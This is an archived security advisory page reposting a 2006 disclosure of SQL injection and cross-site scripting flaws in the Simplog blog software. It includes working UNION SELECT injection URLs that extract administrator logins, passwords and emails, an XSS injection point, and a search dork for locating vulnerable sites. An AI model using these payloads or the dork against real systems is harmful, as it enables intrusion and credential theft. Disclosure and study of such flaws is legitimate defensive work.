|
 |
| SecurityReason | ||
| WLB | ||
| RSS | ||
| Corporate | ||
| Services | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : SecurityAlert | ||||
 SecurityAlert : 755 CVE : CVE-2005-3076 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Exploit Given : Yes Credit : Mustafa Can Bjorn IPEKCI (nukedx nukedx com) Published : 22.04.2006
Advisory Text : --Security Report-- Advisory: Simplog <= 0.93 Multiple Remote Vulnerabilities. --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 21/04/06 22:13 PM --- Contacts:{ ICQ: 10072 MSN/Email: nukedx (at) nukedx (dot) com [email concealed] Web: http://www.nukedx.com } --- Vendor: Simplog (http://www.simplog.org/) Version: 0.93 and prior versions must be affected. About: Via this methods remote attacker can inject arbitrary SQL queries to tid parameter in preview.php, cid,pid and eid in archive.php and pid in comments.php.As u know rgod was published advisory about version 0.92 but he did not notice this SQL injections. He found other SQL injections on archive.php but did not found these vulnerabilities. Also there is cross site scripting vulnerability in imagelist.php's imagedir parameter. Level: Critical --- How&Example: SQL Injection : Needs MySQL > 4.0 GET -> http://[victim]/[simplogdir]/preview.php?adm=tem&blogid=1&tid=[SQL] GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&cid=[SQL] GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&pid=[SQL] GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&eid=[SQL] EXAMPLE -> http://[victim]/[simplogdir]/preview.php?adm=tem&blogid=1&tid=-1/**/UNIO N/**/SELECT/**/ concat(25552,login,25553,password,25554)/**/from/**/blog_users/**/where/ **/admin=1/* EXAMPLE -> http://[victim]/[simplogdir]/archive.php?blogid=1&cid=-1/**/UNION/**/SEL ECT/**/0,null,0,email,0,0,login, password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/* EXAMPLE -> http://[victim]/[simplogdir]/archive.php?blogid=1&pid=-1/**/UNION/**/SEL ECT/**/0,null,0,email,0,0,login, password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/* EXAMPLE -> http://[victim]/[simplogdir]/archive.php?blogid=1&eid=-1/**/UNION/**/SEL ECT/**/0,null,0,email,0,0,login, password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/* EXAMPLE -> http://[victim]/[simplogdir]/comments.php?blogid=1&pid=-1/**/UNION/**/SE LECT/**/0,null,0,email,0,0,login, password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/* with this examples remote attacker can leak speficied admins login information from database. XSS: GET -> http://[victim]/[simplogdir]/imagelist.php?blogid=1&act=add_entry&login= 1&imagedir=[XSS] --- Timeline: * 21/04/2006: Vulnerability found. * 21/04/2006: Contacted with vendor and waiting reply. --- Exploit: http://www.nukedx.com/?getxpl=25 --- Dorks: "powered by simplog" --- Original advisory can be found at: http://www.nukedx.com/?viewdoc=25 Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
*BSD libc (strfmon) Multiple vulnerabilities
Maksymilian Arciemowicz discovered a Integer Overflow vulnerability in the libc library "strfmon()" function.A vulnerability could allow an attacker who successfully exploits this vulnerability to take control of the affected *BSD systems. |
||
| Apache |  |
|
» Apache Tomcat <= |
||
| PHP | |
|
» PHP 5.2.5 and prior : |
||
- 2008-03-25| Copyright © SecurityReason. All Rights Reserved. |